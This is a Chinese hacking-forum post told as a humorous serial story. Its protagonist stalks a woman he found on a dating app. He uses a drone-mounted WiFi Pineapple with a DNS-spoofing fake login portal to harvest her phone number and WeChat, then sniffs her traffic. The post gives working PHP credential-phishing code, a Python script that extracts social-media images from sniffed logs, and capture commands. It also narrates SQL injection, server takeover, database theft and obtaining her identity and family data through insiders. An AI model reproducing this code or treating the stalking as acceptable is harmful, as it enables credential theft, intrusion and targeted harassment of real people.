卧薪尝胆只为你(屌丝黑客"追"妹记第二集)

2016-03-10 23:48:48 230 14285 19


      

「好大的一朵菊花哟~」
-----------------------------
   < / Scorpion echo ‘世界由我来守护’>

PS:大家当小说看不要以技术的眼光去评判,不当之处请忽略勿喷  内行人看门道,外行人看热闹,请不要再教我如何把妹了,就当一个热闹和故事来看就行了

精彩回顾:第一集地址https://www.t00ls.com/thread-31253-1-1.html


第一章:“约炮神器”帮我找到了她
   
      在上一集中Only成功的吓走了妹子,妹子回去对电脑进行了全面的杀毒,最终Only的权限还是掉了,他有一点点的失落,只盼着有一天能和她在人群中相遇,就想问她一句话“为什么要杀毒”
  这天Only跟平常一样熟练的打开各种社交软件在搜附近人,什么QQ啊微信啊,陌陌啊,探探啊,派派啊都被Only玩的了如指掌,突然看到这么一个消息,
Only表现的是异常兴奋啊,这不就是自己的"梦中情人"



“0.75KM”Only拿这手机出去寻找着,最终确定了妹子所在的位置,Only高兴的跑了回来,带上所有的装备前往目的地,北方的3月天气里,晚上吹着小风,有点冷飕飕的感觉,Only带了好几个装逼神器,所用的装备有
1、军区大衣加手套一双,口罩一个,
2、航拍飞行器,
3、WiFi Pineapple
4、3G无线网卡
5、一个超大功率的无线网卡卡皇
7、笔记本一套
听到这我表示很诧异,这货是预谋已久啊,从装备上来看果然是黑阔,Only来到了妹子所在的单元楼下,找了一个阴暗的角落,把无线网卡插到WiFi Pineapple的USB上后进行设置





设置完后把WiFi Pineapple的无线密码改成了conspiracy,然后配置了一个钓鱼站点,他用的是WiFi Pineapple里面的DNS欺骗当然我们可以用别的方法来欺骗






意思就是修改一个网页把提交的表单修改和error.php里一样然后我们在我们修改的网页中输入账号密码会提交到error.php里然后保存到/tmp/pineapple-phish.log里面,而redirect.php就是我们DNS欺骗用到的,当我们输入的网址内含有COM会跳转到WiFi Pineapple - Login.htm(我们修改的网页)

redirect.php:
<?php
        $ref = "http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];

        if (strpos($ref, "com")){
                header('Status: 302 Found');
                header('Location: WiFi Pineapple - Login.html');
        }

        require('error.php');

?>
error.php:
<?php
$ref = $_SERVER['HTTP_REFERER'];
$today = date("F j, Y, g:i a");
if (isset($_POST['name']) && !empty($_POST['name'])) {
        $nam = stripslashes($_POST['name']);
        $pas = stripslashes($_POST['pass']);
        $nam = htmlspecialchars($nam, ENT_QUOTES);
        $pas = htmlspecialchars($pas, ENT_QUOTES);

        $content = $today . "  --  " . $ref . "  --  " . $nam . "  --  " . $pas;

        $filed = @fopen("/tmp/pineapple-phish.log", "a+");
        @fwrite($filed, "$content\n");
        @fclose($filed);
}
?>

<html><head>
<script type="text/javascript">
function goBack()
{
window.history.back()
}
</script>
</head>
<body>
</body></html>
然后Only把钓鱼网页修改成了上网认证网页,要求输入手机号和微信进行认证,因为很多什么咖啡厅啊网吧啊都需要认证,这样妹纸才不会怀疑,还有在第一集中Only已经获得了妹子的QQ所以不需要了,这次掌握她的所有



PS:做的有点丑,大家凑合看就行了
Only做好后开启了DNS欺骗模式
然后将菠萝派安置到了飞行器上,笔记本连上卡皇后再链接上菠萝派的wifi(此目的是因为飞行器飞高后wifi的范围丢失,所以用的卡皇)
这时候看妹子距离我不过30M左右,操控这飞行器飞到2-3楼的中间



然后Only在陌陌中告诉了妹子wifi名称和密码,看到消息已读,Only邪恶的笑了,不一会妹子回复了个"谢谢"
一股股寒风吹过,Only不停的刷新着文件夹希望出现期盼中的pineapple-phish.log,难得妹纸没连上?



确实有连上啊,2个设备.151是我,.24肯定是妹纸了,但还是仍不住在陌陌上问了下妹纸,
“连上了吗?”
“恩”
Only疑惑为什么不上网呢,难得妹纸就是只在聊天看视频? Only想向妹纸推送一个网页自动弹出,但是又想起上次的结果,这次一定要忍住,决不能打草惊蛇,Only默默的念着,不知不觉已经到了晚上8点,一股股寒风袭来,Only不经意的打了个颤,有点迷糊了,差点睡着了,刷新了下文件夹,Only喜出望外,看到了梦寐以求的pineapple-phish.log


然后一看手机,看到了妹子发来的信息
“为什么打不开网页,一直提示让我认证”
Only立马回复
“应该是路由出错了,我重启下”
妹子没有怀疑,Only立马关掉了DNS欺骗,差点吓死了,Only默念着,出了一头的冷汗,Only立马搜索微信验真伪,看来是真的,知道了妹子的QQ,手机以及微信,Only本想着以及得到了想要的赶紧撤,谁知道好奇心太重,开启了URL Snarf (kali同理),于是准备一探虚实



PS:以下是本地手机演示





看到这一排排数据,Only显得越发的高兴
然后他把数据拷贝下来准备读取数据





PS:这是视频
当然还有一些小视频啊,语音啊 空间的说说啊  快手之类的,大家自由发挥吧
du.py:
import re

text = open("1.txt", "r")
png = open('text3.html','w')

while True:   

    line = text.readline()
    if 'mmsns.qpic.cn' in line:
              pat = re.compile('GET(.*)?tp=',re.S) # 微信圈的图片
              result = pat.findall(line)
              text2= ''.join(result)
              text3='<img src='+text2+'></img>'
              print text3
              png.write(text3)

    if 'img.momocdn.com/feedimage/' in line:
              pat = re.compile('GET(.*?)webp',re.S) # 陌陌圈的嗅探
              result = pat.findall(line)
              text2= ''.join(result)
              text3='<img src='+text2+'jpg></img>'
              print text3
              png.write(text3)

    if 'nipic.com' in line:
               pat = re.compile('GET(.*?) HTTP',re.S) # QQ相册
               result = pat.findall(line)
               text2= ''.join(result)
               text3='<img src='+text2+'></img>'
               print text3
               png.write(text3)
                    
text.close()
png.close()
番外篇:
读取一个指定pcap数据包中的图片:
driftnet -f /home/dump_1443200994.pcap -a -d /home/
tcpdump抓包:
tcpdump -i wlan0 -nn -w /mnt/sda1/tcpdump.cap port 80 &
Only清楚的还原这妹子的朋友圈虽然不知道文字,但是还是异常的高兴
也许是因为Only太无聊了吧,看了一会也没有发现什么妹子的自拍视频之类的
额外的还是有一些失落的,收拾了下Only准备回家了,这次Only并没有视图这去获取权限什么的,只是简单的得到了一些信息,回去后妹子发来了信息,问为什么没网了,
Only回答到 “我要睡觉了”,
妹子无奈的"哦”了一下
也没有聊了起来,因为这样的社交软件上献殷勤势必会引起妹子的反感的

第二章:为了你我做什么都可以

Only回去后在各种裤子查起了妹子的QQ号,手机号之类的,各种百度,搜狗 谷歌,最终眼睛一亮,一网站出现了妹子的手机号,点开后原来是某某大学的网站,原来是个舞蹈老师,上面清楚的写着在那次比赛中得了第一名,名字  电话,Only又邪恶了
“难不成又要我日站?我勒个X”
想想都觉得累
打开网站翻了翻果然有



既然旁站好几个,那就柿子就挑软的捏

Only拿出了WebRobot爬了下站



神器就是神器啊果然很强,但是效果还不是很明显,在官方上找啊找啊找,点开新闻中心后是这样子的



难不成把参数隐藏了
继续拿神器来扫下



点开抓取链接  果然被猜到了 是真的



全部发送注入扫描里
看来是存在注入的,那已经成功了一半了



本想着手工拿下  可以一注入 不管输入什么就弹回去了,用什么萝卜头啊之类的也没用,卧槽,看来还是得神器来搞



果然神器就是神器,不一会出现了Only想要的东西



然后登录后台



“ 卧槽,这么简单,搞毛啊,为什么啊测试版,这算个毛啊 %¥@#!@# ”
Only仍不住的骂了起来
但是还是静下心来,右手掏进右边口袋,取了一盒东西出来,掏出一根白色的
类似柱状的物体放在嘴里叼着,左手插入左边口袋取出打火机,右手成弯弓状态护住左手打火机点燃了哪根柱状物体,深吸一口,美妙极了!
仔细的看了看网站,最终还是发现了一个突破口



“ 卧槽,什么情况,玩我呢,这么简单的站居然有这么傻逼的洞!害的我还白失落了一会 ”





Only拿到shell后 root权限



这站让Only一头冷汗,好让人蒙羞啊,Only激动不已,这管理果然是SB,从后台的那几个"测试版"大字上就猜到了,
“看来这是老天要帮我啊”
Only登上服务器脱下裤子
日了个底朝天,最终Only想要的还是工资查询的裤子


Only是什么都想干,什么都想挑战,这时候Only想这么SB的管理员难道注入可以直接写shell?又一次得到了验证




拿到数据库后,Only搜索了下名字,得到身份证后,这下Only发大招了,把查出来的身份证号发给了自己的2个朋友,
一个在运营商那里,一个是警察,得到了以下信息(人生在世,没有几个各行各业的朋友,还活什么,必要时可以像这样帮下忙






确定了妹子的手机号和自己得到的是同一个,也没有其他手机号,也确定了妹子的个人信息和家庭信息
但是Only为什么要得到这些信息?
得到这些信息后他又要干什么呢?
Only又会做一些什么疯狂的事情呢?
和妹子会有什么奇妙的故事发生呢?
这一切的一切都成了迷
想知道答案的话
尽情期待下一集
<Only失忆了>


自评TCV值(5)

关于作者

Anonymous0篇文章0篇回复

We are Anonymous!

评论230次

要评论?请先  登录  或  注册